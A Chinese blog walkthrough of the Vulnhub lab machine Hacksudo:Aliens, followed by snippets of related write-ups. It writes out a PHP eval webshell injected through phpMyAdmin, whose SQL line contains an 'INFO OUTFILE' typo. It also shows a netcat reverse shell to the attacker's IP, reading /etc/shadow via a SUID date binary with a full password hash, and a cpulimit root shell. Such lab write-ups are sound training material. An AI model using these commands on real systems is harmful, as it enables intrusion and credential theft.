【Vulnhub】靶场之Hacksudo:Aliens

最新推荐文章于 2024-05-10 19:02:45 发布
最新推荐文章于 2024-05-10 19:02:45 发布
阅读量5.2k 收藏
点赞数 17
文章标签: android 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76232299/article/details/134730606
版权

目录

一、信息收集

二、数据库后台上传木马

三、反弹shell

四、提权

        1.date读取文件

        2.cpulimit提权

总结

靶机下载

下载链接:https://download.vulnhub.com/hacksudo/HacksudoAliens.zip

一、信息收集

先使用工具扫描靶机IP

arp-scan  -l

 接着扫描靶机开放端口

nmap -sS -sV -p- -T4 <ip>

 这里发现了两个apache服务,分别访问看看

80端口:

9000端口:

 

 可以看出9000端口是mysql后台登录框

尝试了一下弱密码,好像没有什么用

我们使用后台扫描工具

 访问,可以发现有一个mysql的备份文件

下载下来,看看 

 这里有user,password,我们去9000端口尝试登录

二、数据库后台上传木马

登录进来,我们可以先看看数据库中有没有可以利用的信息

似乎没有,我们尝试写入一句话木马

SELECT '<?php @eval($_POST[1]);?>' INFO OUTFILE '/var/www/html/1.php';

 

接下来拿蚁剑连接,进入虚拟终端

三、反弹shell

接下来反弹shell到kali上

kali:nc -lvvp 4444

靶机:nc -e /bin/bash 192.168.15.129 4444

四、提权

        1.date读取文件

看看/home,进入hacksudo,发现没有权限

查找s权限文件

find / -perm -u=s -type f 2>/dev/null

 

 发现date,我们可以利用date越权操作,读取shadow文件

LFILE=/etc/shadow

date -f $LFILE

 使用john爆破hacksudo的密码

echo 'hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::' > 123.txt

john 123.txt

 

        2.cpulimit提权

我们使用ssh登录

在看看有哪些文件有s权限

 有一个cpulimit,是一开始查s权限没有查到的

我们使用cpulimit提权

/home/hacksudo/Downloads/cpulimit -l 100 -f -- /bin/sh -p

 提权成功!!!

总结

信息收集是很重要,思路一步一步的走,就会很轻松了,这个靶机还是蛮有趣了,也不难😁😁😁,有兴趣的可以去玩玩!

是小苏耶
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
kill_aliens:kill_aliens v1-开源
04-28
kill_aliens是一款简单的游戏,您必须杀死一个入侵太阳系的外星人。 制造:C Allegro 4.4代码块
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
Aluxian_的博客
10-26 711
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
Vulnhub靶机:hacksudoAliens
qq_48904485的博客
02-05 767
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudoAliens(10.0.2.46)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/HacksudoAliens.zip。
vulnhubHACKSUDO: ALIEN
qwweggfe的博客
08-12 304
信息收集 首先进行ip扫描 查看开启哪些端口 打开网页进行查看 对其网页目录进行扫描 gobuster dir -u http://192.168.181.149/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 打开/image的目录,发现一张图片,我怀疑可能是隐写,于是进行爆破 stegbrute -f /root/sprites.png -w /usr/share/wordlists..
HacksudoAliens
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-04 399
HacksudoAliens arp-scan --interface=eth0 192.168.1.0/24 nmap -sC -sV -p- -sT 192.168.1.251 -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans sV: Probe open ports to determine service/version info -sC: equivalent to --script=default ..
靶机练习 aliens phpmyadmin拿shell date命令提权
hljzzj的博客
01-25 3588
靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-aliens,676/ 名称: hacksudo系列ALIENS 靶场: VulnHub.com 难度: 简单 发布时间: 2021年4月4日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -.
带你玩转渗透测试靶场Vulnhub——hacksudo3
m0_74025111的博客
04-24 361
从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。
看完这篇教你玩转靶机HACKSUDO: ALIENS
清唪的博客
04-07 552
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: https://download.vulnhub.com/hacksudo/HacksudoAliens.zip 1.nmap -sS -A -p- -n +靶机ip 2.发现有9000端口访.
Vulnhub--hacksudo(thor)靶场
leo788的博客
03-04 217
hacksudo靶机中涉及使用:利用开源源码泄露以及默认管理员信息、路径爬取获得隐藏页面的登录,发现业务逻辑层面的漏洞。破壳漏洞的原理重点关注cgi-bin目录,再利用curl向服务器发起nc 命令进行打点GTFOBins的利用。
Vulnhub靶机测试 No.31 hacksudoAliens
YouthBelief的博客
04-12 561
hacksudoAlienshacksudoAliens1 靶机介绍2 测试过程2.1 nmap探测ip2.2 nmap扫描端口2.3 测试思路2.4 80端口探测2.5 gobuster目录枚举2.6 翻目录2.7 查看mysql.bak2.8 9000端口phpmyadmin登录2.9 蚁剑连接2.10 反弹shell2.11 切换完整终端3 提权3.1 信息收集3.1.1 用户信息收集3.1.2 suid信息收集3.2 suid权限的date读取shadow3.3 john 破解ssh密码3.4 su
Aliens_Analysis:JavaScript和DOM操作
05-18
第14单元| 分配-JavaScript和DOM操作背景唤醒绵羊皮! 地球外的威胁已经到了地球,我们在上收集了所有我们可以证明的目击者报告! 我们现在需要做的就是将这些信息在线发布,以供全世界查看,然后此事将最终平息。...
Alienstalker:是 Alien Stalker 还是 Aliens Talker?
06-04
外星人追踪者 是 Alien Stalker 还是 Aliens Talker?
ascii-aliens:基于文本的射击游戏
03-31
外星人基于文本的射击游戏草图玩家可以向左或向右倾斜: O O O O |\^/| o/| |\o |>-<| |<| |>| |/^\| o\| |/o O O O O 旋转外星人吊舱: _ / \ [|| ] \_/ 钻石上电 /\ <L> \/
welcome-the-aliens:Java 控制台应用程序
06-20
##如何运行克隆存储库$ git clone https://github.com/ashokgujju/welcome-the-aliens.git 将项目导入 Eclipse IDE 并运行。 输出文件将在项目目录中生成。 ##如何添加新的导出格式化程序创建一个名为“something”...
Vulnhub靶机随笔-Hacksudo_Aliens
最新发布
weixin_59005129的博客
05-10 558
5.通过phpmyadmin登录mysql.进入数据库,我第一步去看了一眼user表,发现root用户和vishal用户加密过的密码一致,于是我退出当前登录,登上了root用户,这一步是考虑到可能存在权限的问题,为后面做铺垫,用不上也无所谓。再回到cpulimit提权的命令,就显然易见了,通过具有suid权限的cpulimit将执行/bin/sh的cpu使用率调至100%,也就是强制让电脑一心一意执行/bin/sh。靶机开放三个端口,22ssh端口,80web端口,9000是数据库图形化界面。
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1954
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
vulnhub靶场-hacksudo - Thor
qq_42947816的博客
06-30 918
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
HACKSUDO: FOG靶机
小小猪的博客
06-22 526
HACKSUDO: FOG靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.246 nmap扫描端口 进行目录爆破,发现dict.txt文件 进行访问,获得一堆密码 打开cms目录,发现hacksudo用户名 用刚才获得密码进行爆破,得到密码 登录ftp发现目录,进入目录发现压缩包 将压缩包进行解密 获得两个文件 发现页面有个跳动的链接 点击进入,发现一个图片,查看页面源码 发现一个G.
NotImplementedError: mixer module not available (ModuleNotFoundError: No module named 'pygame.mixer')
07-29
根据引用[1]和引用[3]的内容,你遇到的问题是在开发环境中运行Python源码游戏时,提示"ModuleNotFoundError: No module named 'pygame'"和...python -m pygame.examples.aliens 这样应该就能解决你遇到的问题了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值